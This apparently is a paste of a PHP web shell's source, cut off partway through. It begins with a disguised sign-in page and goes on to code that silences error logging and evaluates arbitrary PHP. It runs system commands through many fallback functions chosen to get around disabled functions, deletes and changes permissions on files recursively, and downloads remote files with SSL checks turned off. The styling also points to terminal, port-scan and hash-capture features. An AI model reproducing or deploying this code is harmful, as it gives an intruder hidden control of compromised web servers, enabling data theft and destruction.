· 7 years ago · Oct 13, 2018, 09:42 AM
1<?php
2<!doctype html>
3<html lang="en">
4<head>
5<meta charset="utf-8">
6<meta name="robots" content="noindex"/>
7<meta name="viewport" content="width=device-width,initial-scale=1,shrink-to-fit=no">
8<title>Signin</title>
9<link href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css">
10<style type='text/css'>
11 html,body{
12 height:100%;
13 }
14 body{
15 display:-ms-flexbox;
16 display:-webkit-box;
17 display:flex;
18 -ms-flex-align:center;
19 -ms-flex-pack:center;
20 -webkit-box-align:center;
21 align-items:center;
22 -webkit-box-pack:center;
23 justify-content:center;
24 padding-top:40px;
25 padding-bottom:40px;
26 background-color:#f5f5f5;
27 }
28 .form-signin{
29 width:100%;
30 max-width:330px;
31 padding:15px;
32 margin:0 auto;
33 }
34 .form-signin.checkbox{
35 font-weight:400;
36 }
37 .form-signin.form-control{
38 position:relative;
39 box-sizing:border-box;
40 height:auto;
41 padding:10px;
42 font-size:16px;
43 }
44 .form-signin.form-control:focus{
45 z-index:2;
46 }
47 .form-signin input[type="email"]{
48 margin-bottom:-1px;
49 border-bottom-right-radius:0;
50 border-bottom-left-radius:0;
51 }
52 .form-signin input[type="password"]{
53 margin-bottom:10px;
54 border-top-left-radius:0;
55 border-top-right-radius:0;
56 }
57</style>
58</head>
59<body class="text-center">
60 <form class="form-signin" method='post'>
61 <h1 class="h3 mb-3 font-weight-normal">Please sign in</h1>
62 <label for="username" class="sr-only">Email address</label>
63 <input type="text" name="username" id="username" class="form-control" placeholder="Username" autocomplete="off" required autofocus>
64 <label for="password" class="sr-only">Password</label>
65 <input type="password" name="password" id="password" class="form-control" placeholder="Password" autocomplete="off" required>
66 <button class="btn btn-lg btn-primary btn-block" type="submit" name="signin" value="signin">Sign In</button>
67 <p class="mt-5 mb-3 text-muted">©<?=date('Y')?></p>
68 </form>
69</body>
70</html><?php
71}
72else
73{
74ob_start(); // Prevent Double Html $_REQUEST
75
76if(!strpos(strval(ini_get('disable_functions')),'set_time_limit'))
77{
78 set_time_limit(0);
79}
80
81// Debug Settings
82if($config['debug']==true)
83{
84 error_reporting(E_ERROR | E_WARNING | E_PARSE | E_NOTICE);
85}
86else
87{
88 error_reporting(0);
89 ini_set('error_log',null);
90 ini_set('html_errors',0);
91 ini_set('log_errors',0);
92 ini_set('log_errors_max_len',0);
93 ini_set('display_errors',0);
94 ini_set('display_startup_errors',0);
95}
96
97ini_set('max_execution_time','600');
98ini_set('memory_limit','256M');
99
100$agent=B64D("FT06ACQoAXYrvHYXMUIMMV5e"); // Powered by B4TM4N
101$title=sprintf('%s - %s',$config['title'],$config['tagline']); // Title Page
102$start=microtime(true); // Time Pageload
103
104?><!DOCTYPE html>
105<html>
106<head>
107<title>
108<?=$title?>
109</title>
110<meta name='author' content='k4mpr3t'/>
111<link href="data:image/png;base64,AAABAAEAEBACAAAAAACwAAAAFgAAACgAAAAQAAAAIAAAAAEAAQAAAAAAQAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//wAA//8AAP//AAD//wAA//8AAP7/AAD8fwAAwAcAAMAHAACMYwAADWEAAP//AAD//wAA//8AAP//AAD//wAA" rel="icon" type="image/x-icon" />
112<style type="text/css">
113
114 *,html{margin:0;padding:0;line-height:1rem}
115 img{vertical-align:bottom}
116
117 #wrapper{width:93%;margin:37px auto 40px}
118 #info{margin:0 0 23px 0;padding:0 13px 0 0}
119
120 #header{display:inline-block;width:100%}
121 .header-left{float:left;width:66%}
122 .header-right{float:right;width:34%}
123
124 #connect{display:inline-block;width:100%}
125 .connect-left{float:left;width:49%}
126 .connect-right{float:right;width:49%}
127
128 #database-session{display:inline-block;width:100%}
129 .database-query{float:left;width:49%}
130 .database-process{float:right;width:49%}
131
132 #php{display:inline-block}
133 .php-left{float:left;width:49%}
134 .php-right{float:right;width:49%}
135
136 .divide{width:100%;display:inline-block}
137 .divide-left{float:left;width:50%}
138 .divide-right{float:right;width:50%}
139
140 .mail input[type=text]{width:100%;display:block}
141 .database-breadcrumb{margin:10px 0 0;display:inline-block;font-style: italic;}
142
143 #update{text-align:center}
144 #php-configuration{text-align:center}
145
146 /* THEMES */
147
148 body{background:#000;color:#00ff00;font-family:monospace;font-size:13px}
149 hr{border:1px solid #111;margin:3px 0px 0px}
150 ::-moz-selection{background:red;color:white}
151 ::selection{background:red;color:white}
152 a{color:#00ff00;text-decoration:none}
153 a:hover{color:white}
154
155 a.active{color:white}
156 a.action{font-size:12px;padding:5px;margin:0px;background:#111;color:#fff;border:1px solid #222;cursor:pointer;outline:none;display:inline-block}
157 a.action:hover{background:#222;border:1px solid #666}
158
159 #logo{margin:0 0 23px 0;padding:23px 0 23px 0;border-top:1px solid #111;border-bottom:1px solid #111}
160 .content{border:1px solid #111;padding:10px;overflow:auto;overflow-y:hidden}
161
162
163 #process-list{padding:25px;margin:25px auto 0px;border:1px solid #111;overflow:scroll;overflow-y:hidden}
164 #process-list s{text-decoration:none}
165
166 .tools-header{margin-bottom:20px;padding-bottom:25px;text-align:center;border-bottom:1px solid #111}
167
168 .menu{overflow:hidden;border-top:1px solid #111;border-bottom:1px solid #111;margin:10px 0}
169 .menu > ul{list-style:none;margin:0;padding:0}
170 .menu > ul > li{margin:0 3px 0 0;padding:10px 7px 10px 7px;display:block;float:left}
171 .menu > ul > li:hover{cursor:pointer}
172
173 .menu-tools{overflow:hidden;border-top:1px solid #111;border-bottom:1px solid #111;margin:10px 0}
174 .menu-tools > ul{list-style:none;margin:0;padding:0}
175 .menu-tools > ul > li{margin:0 3px 0 0;padding:10px 7px 10px 7px;display:block;float:left}
176 .menu-tools > ul > li:hover{cursor:pointer}
177
178 .menu-directory{;margin-bottom:10px}
179 .new{margin-right:15px;}
180
181 .hash label{min-width:40px;display:inline-block;padding-right:15px}
182 .hash-capture label{margin:10px 0;display:inline-block}
183 .hash input[type=radio]{margin-right:10px;display:inline-block;vertical-align:middle}
184
185 label{display:inline-block;min-width:75px;padding-right:15px}
186 iframe{background:#fff}
187
188 .auto-number table{counter-reset:row_}
189 .auto-number table tbody tr td:first-child{counter-increment:row_;vertical-align:middle;text-align:center}
190 .auto-number table tbody tr td:first-child::before{content:counter(row_)}
191
192 fieldset {border:1px solid #111;background:#000;color:#00ff00;width:100%;padding:15px;box-sizing:border-box;min-height:154px}
193 textarea {border:1px solid #111;background:#000;color:#00ff00;width:100%;padding:15px;min-height:300px;outline:none;box-sizing:border-box;resize:none}
194 input[type=submit] {background:#111;border:1px solid #222;color:#fff;line-height:25px;padding:0 10px;cursor:pointer;outline:none}
195 input[type=submit]:hover {background:#222;border:1px solid #666}
196 input[type=text] {background:#000;color:#00ff00;border:1px solid #111;width:200px;padding:5px;outline:none;box-sizing:border-box}
197 input[type=number]{background:#000;color:#00ff00;border:1px solid #111;width:200px;padding:5px;outline:none;box-sizing:border-box}
198 input[type=file] {background:#000;color:#00ff00;border:1px solid #111;width:200px;padding:2px;outline:none;box-sizing:border-box}
199 select {background:#000;color:#00ff00;border:1px solid #111;width:200px;padding:5px;outline:none;box-sizing:border-box}
200
201 #title{text-align:center;font-size:44px;margin:0;color:#fff}
202 #tools{min-height:125px;padding:10px;border-radius:5px}
203 #account{min-height:100px;padding:10px;border-radius:5px}
204 #thanks{text-align:center;font-size:16px;font-family:courier;padding:5% 0}
205 #footer{margin:25px auto}
206 #copyrights{text-align:center}
207 #pageload{text-align:center}
208 #query{margin-top:10px}
209 #database-query{overflow:auto;margin:10px 0}
210 #hexdump{height:300px;overflow:auto;overflow-x:hidden}
211 #terminal{min-height:100px;padding:10px;border-radius:5px}
212 #terminal-input{border:none}
213 #curdir-terminal{min-width:10px}
214 #database{min-height:100px;padding:10px;border-radius:5px}
215 #database label{width:100px;padding:5px;margin-right:10px;display:inline-block}
216 #port-scan label{width:100px;padding:5px;margin-right:10px;display:inline-block}
217
218 #phpinfo table{margin:25px 0}
219 #phpinfo tr:nth-child(odd){background:#000}
220 #phpinfo tr:nth-child(even){background:#111}
221 #phpinfo td,th{padding:5px;border:1px solid #111}
222 #phpinfo h1{margin:10px 0}
223 #phpinfo h2{margin:10px 0}
224 #phpinfo.e{width:200px}
225 #phpinfo.v{word-break:break-word}
226 #phpinfo img{display:none}
227 #phpinfo hr{border:none}
228
229 .line h2{position:relative;top:12px;width:100px;display:inline;background:#000;padding:0 10px;color:#fff}
230 .line{border-bottom:2px solid #00ff00;text-align:center;width:287px;margin:auto}
231
232 .table {width:100%;margin:10px 0}
233 .table td,th{padding:5px;border:1px solid #111;max-width:250px;min-width:25px}
234 .table td.kanan{word-break:break-word}
235 .table td.kiri{width:30%}
236 .table tr:nth-child(odd){background:#000}
237 .table tr:nth-child(even){background:#111}
238 .table tr:hover td{background:#333}
239
240 .database-table > td.table {word-break:normal;}
241
242 .table tfoot td{padding:10px;text-align:center}
243 .map-switch{display:inline-block}
244
245 .form-fix{margin:-15px 0}
246 .frmsource{margin-top:10px}
247
248 .hexdump{width:100%;padding:5px;margin-bottom:5px}
249 .hexdump td{text-align:left}
250
251 .highlight{background:#fff;word-break:break-word;padding:15px;margin-bottom:5px;height:300px;overflow:auto}
252
253 .hash-capture{display:inline-block;width:100%}
254 .hash-capture-left{float:left;width:49%}
255 .hash-capture-right{float:right;width:49%}
256
257 .clr{clear:both}
258 .on{color:white}
259 .off{color:red}
260 .result{padding:10px}
261 .sortable thead{cursor:pointer}
262 .disablefunc{overflow-wrap:break-word}
263 .loading{vertical-align:middle;width:16px;height:16px;display:inline-block;background:url('data:image/gif;base64,R0lGODlhEAAQAPIAAAAAAP///zw8PLy8vP///5ycnHx8fGxsbCH+GkNyZWF0ZWQgd2l0aCBhamF4bG9hZC5pbmZvACH5BAAKAAAAIf8LTkVUU0NBUEUyLjADAQAAACwAAAAAEAAQAAADMwi63P4wyklrE2MIOggZnAdOmGYJRbExwroUmcG2LmDEwnHQLVsYOd2mBzkYDAdKa+dIAAAh+QQACgABACwAAAAAEAAQAAADNAi63P5OjCEgG4QMu7DmikRxQlFUYDEZIGBMRVsaqHwctXXf7WEYB4Ag1xjihkMZsiUkKhIAIfkEAAoAAgAsAAAAABAAEAAAAzYIujIjK8pByJDMlFYvBoVjHA70GU7xSUJhmKtwHPAKzLO9HMaoKwJZ7Rf8AYPDDzKpZBqfvwQAIfkEAAoAAwAsAAAAABAAEAAAAzMIumIlK8oyhpHsnFZfhYumCYUhDAQxRIdhHBGqRoKw0R8DYlJd8z0fMDgsGo/IpHI5TAAAIfkEAAoABAAsAAAAABAAEAAAAzIIunInK0rnZBTwGPNMgQwmdsNgXGJUlIWEuR5oWUIpz8pAEAMe6TwfwyYsGo/IpFKSAAAh+QQACgAFACwAAAAAEAAQAAADMwi6IMKQORfjdOe82p4wGccc4CEuQradylesojEMBgsUc2G7sDX3lQGBMLAJibufbSlKAAAh+QQACgAGACwAAAAAEAAQAAADMgi63P7wCRHZnFVdmgHu2nFwlWCI3WGc3TSWhUFGxTAUkGCbtgENBMJAEJsxgMLWzpEAACH5BAAKAAcALAAAAAAQABAAAAMyCLrc/jDKSatlQtScKdceCAjDII7HcQ4EMTCpyrCuUBjCYRgHVtqlAiB1YhiCnlsRkAAAOwAAAAAAAAAAAA==')}
264</style>
265<script type="text/javascript">
266function dean_addEvent(t,e,r){if(t.addEventListener)t.addEventListener(e,r,!1);else{r.$$guid||(r.$$guid=dean_addEvent.guid++),t.events||(t.events={});var o=t.events[e];o||(o=t.events[e]={},t["on"+e]&&(o[0]=t["on"+e])),o[r.$$guid]=r,t["on"+e]=handleEvent}}function removeEvent(t,e,r){t.removeEventListener?t.removeEventListener(e,r,!1):t.events&&t.events[e]&&delete t.events[e][r.$$guid]}function handleEvent(t){var e=!0;t=t||fixEvent(((this.ownerDocument||this.document||this).parentWindow||window).event);var r=this.events[t.type];for(var o in r)this.$$handleEvent=r[o],!1===this.$$handleEvent(t)&&(e=!1);return e}function fixEvent(t){return t.preventDefault=fixEvent.preventDefault,t.stopPropagation=fixEvent.stopPropagation,t}var stIsIE=!1;if(sorttable={init:function(){arguments.callee.done||(arguments.callee.done=!0,_timer&&clearInterval(_timer),document.createElement&&document.getElementsByTagName&&(sorttable.DATE_RE=/^(\d\d?)[\/\.-](\d\d?)[\/\.-]((\d\d)?\d\d)$/,forEach(document.getElementsByTagName("table"),function(t){-1!=t.className.search(/\bsortable\b/)&&sorttable.makeSortable(t)})))},makeSortable:function(t){if(0==t.getElementsByTagName("thead").length&&(the=document.createElement("thead"),the.appendChild(t.rows[0]),t.insertBefore(the,t.firstChild)),null==t.tHead&&(t.tHead=t.getElementsByTagName("thead")[0]),1==t.tHead.rows.length){sortbottomrows=[];for(e=0;e<t.rows.length;e++)-1!=t.rows[e].className.search(/\bsortbottom\b/)&&(sortbottomrows[sortbottomrows.length]=t.rows[e]);if(sortbottomrows){null==t.tFoot&&(tfo=document.createElement("tfoot"),t.appendChild(tfo));for(e=0;e<sortbottomrows.length;e++)tfo.appendChild(sortbottomrows[e]);delete sortbottomrows}headrow=t.tHead.rows[0].cells;for(var e=0;e<headrow.length;e++)headrow[e].className.match(/\bsorttable_nosort\b/)||(mtch=headrow[e].className.match(/\bsorttable_([a-z0-9]+)\b/),mtch&&(override=mtch[1]),mtch&&"function"==typeof sorttable["sort_"+override]?headrow[e].sorttable_sortfunction=sorttable["sort_"+override]:headrow[e].sorttable_sortfunction=sorttable.guessType(t,e),headrow[e].sorttable_columnindex=e,headrow[e].sorttable_tbody=t.tBodies[0],dean_addEvent(headrow[e],"click",sorttable.innerSortFunction=function(t){if(-1!=this.className.search(/\bsorttable_sorted\b/))return sorttable.reverse(this.sorttable_tbody),this.className=this.className.replace("sorttable_sorted","sorttable_sorted_reverse"),this.removeChild(document.getElementById("sorttable_sortfwdind")),sortrevind=document.createElement("span"),sortrevind.id="sorttable_sortrevind",sortrevind.innerHTML=stIsIE?' <font face="webdings">5</font>':" ▴",void this.appendChild(sortrevind);if(-1!=this.className.search(/\bsorttable_sorted_reverse\b/))return sorttable.reverse(this.sorttable_tbody),this.className=this.className.replace("sorttable_sorted_reverse","sorttable_sorted"),this.removeChild(document.getElementById("sorttable_sortrevind")),sortfwdind=document.createElement("span"),sortfwdind.id="sorttable_sortfwdind",sortfwdind.innerHTML=stIsIE?' <font face="webdings">6</font>':" ▾",void this.appendChild(sortfwdind);theadrow=this.parentNode,forEach(theadrow.childNodes,function(t){1==t.nodeType&&(t.className=t.className.replace("sorttable_sorted_reverse",""),t.className=t.className.replace("sorttable_sorted",""))}),sortfwdind=document.getElementById("sorttable_sortfwdind"),sortfwdind&&sortfwdind.parentNode.removeChild(sortfwdind),sortrevind=document.getElementById("sorttable_sortrevind"),sortrevind&&sortrevind.parentNode.removeChild(sortrevind),this.className+=" sorttable_sorted",sortfwdind=document.createElement("span"),sortfwdind.id="sorttable_sortfwdind",sortfwdind.innerHTML=stIsIE?' <font face="webdings">6</font>':" ▾",this.appendChild(sortfwdind),row_array=[],col=this.sorttable_columnindex,rows=this.sorttable_tbody.rows;for(e=0;e<rows.length;e++)row_array[row_array.length]=[sorttable.getInnerText(rows[e].cells[col]),rows[e]];row_array.sort(this.sorttable_sortfunction),tb=this.sorttable_tbody;for(var e=0;e<row_array.length;e++)tb.appendChild(row_array[e][1]);delete row_array}))}},guessType:function(t,e){sortfn=sorttable.sort_alpha;for(var r=0;r<t.tBodies[0].rows.length;r++)if(text=sorttable.getInnerText(t.tBodies[0].rows[r].cells[e]),""!=text){if(text.match(/^-?[£$¤]?[\d,.]+%?$/))return sorttable.sort_numeric;if(possdate=text.match(sorttable.DATE_RE),possdate){if(first=parseInt(possdate[1]),second=parseInt(possdate[2]),first>12)return sorttable.sort_ddmm;if(second>12)return sorttable.sort_mmdd;sortfn=sorttable.sort_ddmm}}return sortfn},getInnerText:function(t){if(!t)return"";if(hasInputs="function"==typeof t.getElementsByTagName&&t.getElementsByTagName("input").length,null!=t.getAttribute("sorttable_customkey"))return t.getAttribute("sorttable_customkey");if(void 0!==t.textContent&&!hasInputs)return t.textContent.replace(/^\s+|\s+$/g,"");if(void 0!==t.innerText&&!hasInputs)return t.innerText.replace(/^\s+|\s+$/g,"");if(void 0!==t.text&&!hasInputs)return t.text.replace(/^\s+|\s+$/g,"");switch(t.nodeType){case 3:if("input"==t.nodeName.toLowerCase())return t.value.replace(/^\s+|\s+$/g,"");case 4:return t.nodeValue.replace(/^\s+|\s+$/g,"");case 1:case 11:for(var e="",r=0;r<t.childNodes.length;r++)e+=sorttable.getInnerText(t.childNodes[r]);return e.replace(/^\s+|\s+$/g,"");default:return""}},reverse:function(t){newrows=[];for(e=0;e<t.rows.length;e++)newrows[newrows.length]=t.rows[e];for(var e=newrows.length-1;e>=0;e--)t.appendChild(newrows[e]);delete newrows},sort_numeric:function(t,e){return aa=parseFloat(t[0].replace(/[^0-9.-]/g,"")),isNaN(aa)&&(aa=0),bb=parseFloat(e[0].replace(/[^0-9.-]/g,"")),isNaN(bb)&&(bb=0),aa-bb},sort_alpha:function(t,e){return t[0]==e[0]?0:t[0]<e[0]?-1:1},sort_ddmm:function(t,e){return mtch=t[0].match(sorttable.DATE_RE),y=mtch[3],m=mtch[2],d=mtch[1],1==m.length&&(m="0"+m),1==d.length&&(d="0"+d),dt1=y+m+d,mtch=e[0].match(sorttable.DATE_RE),y=mtch[3],m=mtch[2],d=mtch[1],1==m.length&&(m="0"+m),1==d.length&&(d="0"+d),dt2=y+m+d,dt1==dt2?0:dt1<dt2?-1:1},sort_mmdd:function(t,e){return mtch=t[0].match(sorttable.DATE_RE),y=mtch[3],d=mtch[2],m=mtch[1],1==m.length&&(m="0"+m),1==d.length&&(d="0"+d),dt1=y+m+d,mtch=e[0].match(sorttable.DATE_RE),y=mtch[3],d=mtch[2],m=mtch[1],1==m.length&&(m="0"+m),1==d.length&&(d="0"+d),dt2=y+m+d,dt1==dt2?0:dt1<dt2?-1:1},shaker_sort:function(t,e){for(var r=0,o=t.length-1,n=!0;n;){n=!1;for(s=r;s<o;++s)if(e(t[s],t[s+1])>0){a=t[s];t[s]=t[s+1],t[s+1]=a,n=!0}if(o--,!n)break;for(var s=o;s>r;--s)if(e(t[s],t[s-1])<0){var a=t[s];t[s]=t[s-1],t[s-1]=a,n=!0}r++}}},document.addEventListener&&document.addEventListener("DOMContentLoaded",sorttable.init,!1),/WebKit/i.test(navigator.userAgent))var _timer=setInterval(function(){/loaded|complete/.test(document.readyState)&&sorttable.init()},10);window.onload=sorttable.init,dean_addEvent.guid=1,fixEvent.preventDefault=function(){this.returnValue=!1},fixEvent.stopPropagation=function(){this.cancelBubble=!0},Array.forEach||(Array.forEach=function(t,e,r){for(var o=0;o<t.length;o++)e.call(r,t[o],o,t)}),Function.prototype.forEach=function(t,e,r){for(var o in t)void 0===this.prototype[o]&&e.call(r,t[o],o,t)},String.forEach=function(t,e,r){Array.forEach(t.split(""),function(o,n){e.call(r,o,n,t)})};var forEach=function(t,e,r){if(t){var o=Object;if(t instanceof Function)o=Function;else{if(t.forEach instanceof Function)return void t.forEach(e,r);"string"==typeof t?o=String:"number"==typeof t.length&&(o=Array)}o.forEach(t,e,r)}};
267</script>
268<script type="text/javascript">
269 var xhr;
270 window.onload=function(){
271 getFocus("terminal-input");
272 getFocus("find-action");
273 getFocus("sourcefocus");
274 getFocus("php-code");
275 };
276 function getFocus(id){
277 if(document.getElementById(id)!==null){
278 document.getElementById(id).focus();}
279 }
280 function getAjax(txt,id,method,url){
281 var xmlhttp;
282 var urlf="";
283 var data=new FormData();
284 var params=url.split("&");
285 for(i=0;i<params.length;i++){
286 val=params[i].split("=");
287 if(val[0]=='text-encode'){
288 data.append(val[0],val[1]);
289 }else{if(val[0].indexOf('?')<0)
290 {urlf+='&'+val[0]+'='+val[1];}}}
291 if(window.XMLHttpRequest){xmlhttp=new XMLHttpRequest();
292 }else{xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");}
293 xmlhttp.onreadystatechange=function(){
294 sts=["Request Not Initialized",
295 "Server Connection Established",
296 "Request Received",
297 "Processing Request",
298 "Request Finished"];
299 if(xmlhttp.readyState==4&&xmlhttp.status==200){
300 if(txt){document.getElementById(id).innerHTML=xmlhttp.responseText;
301 }else{document.getElementById(id).value=xmlhttp.responseText;}
302 }else{
303 if(txt){document.getElementById(id).innerHTML=
304 "[Status] "+"Please Wait... <div class='loading'></div><br>"+
305 "[State] "+sts[xmlhttp.readyState]+"<br>"+
306 "[Response] "+xmlhttp.response;
307 }else{document.getElementById(id).value=
308 "[Status] "+"Please Wait...\n"+
309 "[State] "+sts[xmlhttp.readyState]+"\n"+
310 "[Response] "+xmlhttp.response;}}
311 };
312 xmlhttp.open(method,window.location.href+urlf,true);
313 xmlhttp.send(data);
314 xhr=xmlhttp;
315 }
316 function ajaxAbort(txt,id){
317 if(txt){document.getElementById(id).innerHTML="Canceled";
318 }else{document.getElementById(id).value="Canceled";}
319 xhr.abort();
320 }
321 function checkAll(){
322 for(var i=0;i<document.getElementsByName('chk[]').length;i++){
323 document.getElementsByName('chk[]')[i].checked=document.getElementsByName('check-all')[0].checked;}
324 }
325 function checkCount(id){
326 count=1;
327 for(var i=0;i<document.getElementsByName('chk[]').length;i++){
328 if(document.getElementsByName('chk[]')[i].checked){
329 document.getElementById(id).innerHTML=count++;
330 }else{document.getElementById(id).innerHTML=count-1;}}
331 }
332 function mapSwitch(id,id2){
333 var a=document.getElementById(id);
334 var b=document.getElementById(id2);
335 if(a.style.display=='inline-block'){
336 a.style.display='none';
337 b.style.display='inline-block';
338 }else{a.style.display='inline-block';
339 b.style.display='none';}
340 }
341 function getParameter(p) {
342 var searchString=window.location.search.substring(1),
343 i,val,params=searchString.split("&");
344 for(i=0;i<params.length;i++){
345 val=params[i].split("=");
346 if(val[0]==p){
347 return val[1];}}
348 return null;
349 }
350</script>
351</head>
352<body>
353<div id="wrapper"><?php
354
355$cur=any("c",$_SESSION)?urld($_SESSION['c']):getcwd();
356$dir=any("d",$_REQUEST)?urld($_REQUEST['d']):$cur;
357$map=any("r",$_REQUEST)?dirname(urld($_REQUEST['r'])):$dir;
358
359function Unix()
360{
361 return(strtolower(substr(PHP_OS,0,3))!="win");
362}
363
364function Evil($x,$y=false)
365{
366 $c=$y==true?"?>".$x."<?php ":$x;
367 $evil=@eval($c);
368 if(error_get_last())
369 {
370 print "\n[Error] ";
371 return print_r(error_get_last());
372 }
373 return $evil;
374}
375
376function Execute($x)
377{
378 $x=$x.' 2>&1';
379 if(!is_null($backtic=`$x`))
380 {
381 return $backtic;
382 }
383 elseif(function_exists('system'))
384 {
385 ob_start();
386 $system=system($x);
387 $buff=ob_get_contents();
388 ob_end_clean();
389 return $buff;
390 }
391 elseif(function_exists('exec'))
392 {
393 $buff="";
394 exec($x,$results);
395 foreach($results as $result)
396 {
397 $buff.=$result;
398 }
399 return $buff;
400 }
401 elseif(function_exists('shell_exec'))
402 {
403 $buff=shell_exec($x);
404 return $buff;
405 }
406 elseif(function_exists('pcntl_exec'))
407 {
408 $buff=pcntl_exec($x);
409 return $buff;
410 }
411 elseif(function_exists('passthru'))
412 {
413 ob_start();
414 $passthru=passthru($x);
415 $buff=ob_get_contents();
416 ob_end_clean();
417 return $buff;
418 }
419 elseif(function_exists('proc_open'))
420 {
421 $proc=proc_open($x,array(
422 array("pipe","r"),
423 array("pipe","w"),
424 array("pipe","w")
425 ),$pipes);
426 $buff=stream_get_contents($pipes[1]);
427 return $buff;
428 }
429 elseif(function_exists('popen'))
430 {
431 $buff="";
432 $pop=popen($x,"r");
433 while(!feof($pop))
434 {
435 $buff.=fread($pop,1024);
436 }
437 pclose($pop);
438 return $buff;
439 }
440 return "R.I.P Command";
441}
442
443function Remove($x)
444{
445 if(is_dir($x))
446 {
447 if($h=@opendir($x))
448 {
449 while(false!==($f=readdir($h)))
450 {
451 if($f!="."&&$f!="..")
452 {
453 Remove($x._.$f);
454 }
455 }
456 closedir($h);
457 }
458 return rmdir($x);
459 }
460 elseif(is_file($x))
461 {
462 return unlink($x);
463 }
464 return false;
465}
466
467function ChmodRecursive($x,$y)
468{
469 if(is_dir($x))
470 {
471 if($h=@opendir($x))
472 {
473 while(false!==($f=readdir($h)))
474 {
475 if($f!="."&&$f!="..")
476 {
477 ChmodRecursive($x._.$f);
478 }
479 }
480 closedir($h);
481 }
482 return chmod($x,$y);
483 }
484 elseif(is_file($x))
485 {
486 return chmod($x,$y);
487 }
488 return false;
489}
490
491function CopyRecursive($x,$y)
492{
493 if(is_dir($x))
494 {
495 @mkdir($y);
496 if($h=@opendir($x))
497 {
498 while(false!==($f=readdir($h)))
499 {
500 if($f!="."&&$f!="..")
501 {
502 CopyRecursive($x._.$f,$y._.$f);
503 }
504 }
505 closedir($h);
506 }
507 return true;
508 }
509 elseif(is_file($x))
510 {
511 return copy($x,$y);
512 }
513 return false;
514}
515
516function MoveRecursive($x,$y)
517{
518 if(is_dir($x))
519 {
520 @mkdir($y);
521 if($h=@opendir($x))
522 {
523 while(false!==($f=readdir($h)))
524 {
525 if($f!="."&&$f!="..")
526 {
527 MoveRecursive($x._.$f,$y._.$f);
528 }
529 }
530 closedir($h);
531 }
532 return Remove($x);
533 }
534 elseif(is_file($x))
535 {
536 if(copy($x,$y))
537 {
538 return unlink($x);
539 }
540 }
541 return false;
542}
543
544function GetDownloadUrl($x,$y)
545{
546 global $agent;
547 $fl=fopen($y,"w");
548 $ch=curl_init();
549 curl_setopt($ch,CURLOPT_USERAGENT,$agent);
550 curl_setopt($ch,CURLOPT_URL,$x);
551 curl_setopt($ch,CURLOPT_FILE,$fl);
552 curl_setopt($ch,CURLOPT_HEADER,0);
553 curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);
554 curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
555 curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
556 $rs=curl_exec($ch);
557 if(curl_error($ch)) return curl_error($ch);
558 curl_close($ch);
559 fclose($fl);
560 return true;
561}
562
563function GetUrlExists($x)
564{
565 global $agent;
566 $ch=curl_init();
567 curl_setopt($ch,CURLOPT_USERAGENT,$agent);
568 curl_setopt($ch,CURLOPT_URL,$x);
569 curl_setopt($ch,CURLOPT_TIMEOUT,5);
570 curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,5);
571 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
572 $rs=curl_exec($ch);
573 $http=curl_getinfo($ch,CURLINFO_HTTP_CODE);
574 if(curl_error($ch)) return curl_error($ch);
575 curl_close($ch);
576 return ($http>=200 && $http<300);
577}
578
579function GetUrlContent($x)
580{
581 global $agent;
582 $ch=curl_init();
583 curl_setopt($ch,CURLOPT_USERAGENT,$agent);
584 curl_setopt($ch,CURLOPT_URL,$x);
585 curl_setopt($ch,CURLOPT_SSL_VERIFYHOST,0);
586 curl_setopt($ch,CURLOPT_SSL_VERIFYPEER,0);
587 curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
588 $rs=curl_exec($ch);
589 if(curl_error($ch)) return curl_error($ch);
590 curl_close($ch);
591 return $rs;
592}
593
594function GetUrlFromPath($x)
595{
596 $fix_path=str_replace(_,'/',$x);
597 $protocol=empty($_SERVER['HTTPS'])||$_SERVER['HTTPS']==='off'?'http://':'https://';
598 $path=str_replace(document_root,'',$fix_path);
599 return $protocol.server_name.$path;
600}
601
602function PostUrlContent($url,$content)
603{
604 global $agent;
605 $params=array(
606 'http' => array(
607 'method' => "POST",
608 'header' => "Content-Type: application/x-www-form-urlencoded\r\n".
609 "User-Agent: $agent\r\n",
610 'content' => http_build_query($content)
611 )
612 );
613 $results="";
614 $context=stream_context_create($params);
615 $header=get_headers($url);
616 if($http=substr($header[0],9,3) != "200")
617 {
618 $results="Error: $http";
619 }
620 else
621 {
622 //file_get_contents
623 if($contents=file_get_contents($url,null,$context))
624 {
625 $results=htmlspecialchars($contents);
626 }
627
628 //stream_get_contents
629 if($handle=fopen($url,'r',false,$context))
630 {
631 $contents=stream_get_contents($handle);
632 fclose($handle);
633 $results=htmlspecialchars($contents);
634 }
635
636 //fopen
637 if($handle=fopen($url,'r',false,$context))
638 {
639 $contents="";
640 while(!feof($handle))
641 {
642 $contents.=fread($handle,10240);
643 }
644 fclose($handle);
645 $results=htmlspecialchars($contents);
646 }
647
648 }
649 return $results;
650}
651
652function GetFileType($x)
653{
654 if(is_file($x))
655 {
656 return end(explode(".",end(explode(_,$x))));
657 }
658 elseif(is_dir($x))
659 {
660 return "dir";
661 }
662 elseif(is_link($x))
663 {
664 return "link";
665 }
666 else
667 {
668 return "-";
669 }
670}
671
672function GetFileTime($x,$y)
673{
674 switch($y)
675 {
676 case "create":return date("Y-m-d H:i:s",@filectime($x));break;
677 case "modify":return date("Y-m-d H:i:s",@filemtime($x));break;
678 case "access":return date("Y-m-d H:i:s",@fileatime($x));break;
679 }
680}
681
682function GetFilePerm($x)
683{
684 $perms=@fileperms($x);
685 switch ($perms & 0xF000)
686 {case 0xC000:$info='s';break;case 0xA000:$info='l';break;
687 case 0x8000:$info='r';break;case 0x6000:$info='b';break;
688 case 0x4000:$info='d';break;case 0x2000:$info='c';break;
689 case 0x1000:$info='p';break;default:$info='u';}
690 $info .=(($perms & 0x0100)?'r':'-');$info .=(($perms & 0x0080)?'w':'-');
691 $info .=(($perms & 0x0040)?(($perms & 0x0800)?'s':'x' ):(($perms & 0x0800)?'S':'-'));
692 $info .=(($perms & 0x0020)?'r':'-');$info .=(($perms & 0x0010)?'w':'-');
